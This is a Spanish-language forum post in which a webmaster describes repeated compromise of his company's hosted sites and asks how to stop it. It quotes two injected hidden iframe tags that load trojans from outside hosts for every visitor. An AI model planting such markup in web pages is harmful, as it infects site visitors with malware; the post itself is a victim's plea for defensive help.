Buenas tardes a todos.
Desde hace ya 2 semanas tenemos problemas en nuestro hosting de empresa.
En los servidores de una de las empresas de Hosting nos han aparecido dentro de las páginas Webs (después del tag del Body o al final del documento) elementos IFRAME que hacen cargas de troyanos a los usuarios cuando navegan.
Estos troyanos son reales, dado que mi antiSpyware y antivirus los detectan cada vez que entro, por lo cual, estamos infectando a los usuarios.
PArece ser que estos elementos, según los técnivos de MediaTemple (hosting) nos los han colado por medio de llamadas a URLs y gracias a la directiva PHP
allow_url_fopen.
dicha directiva ha sido desactivada en los 2 servidores que tenemos pero nuevamente aparecen los códigos (los cuales tienen una apariencia parecida a:)
Código:
<iframe src ="http://www.groundplan.info/aaqq/?aa2f63ed43c8f62dbfe18c95544b491f" width="1" height="1"> </iframe>
<iframe src="http://c6p.at:8080/ts/in.cgi?pepsi140" width=125 height=125 style="visibility: hidden"></iframe>
y otras variantes más.
Me he conectado la los 2 servidores vía SSH, y he eliminado dichos códigos gracias a un script que hemos creado en este post (pregunta tras pregunta)
http://www.forosdelweb.com/f41/reemp...chivos-728149/
Funcionar, funciona, me limpia los archivos, pero días después, aparecen nuevamente, los usuarios llaman porque se les ha infectado el ordenador y tiene que formatear...
¿Cómo atajar esto?
¿Qué debemos hacer?
Espero todos vuestros comentarios, dado que mi jefe está empezando a desesperar, porque pierde usuarios, ventas, y necesitamos una solución.
Muchas gracias de antemano a todos.
Un saludo.
Javier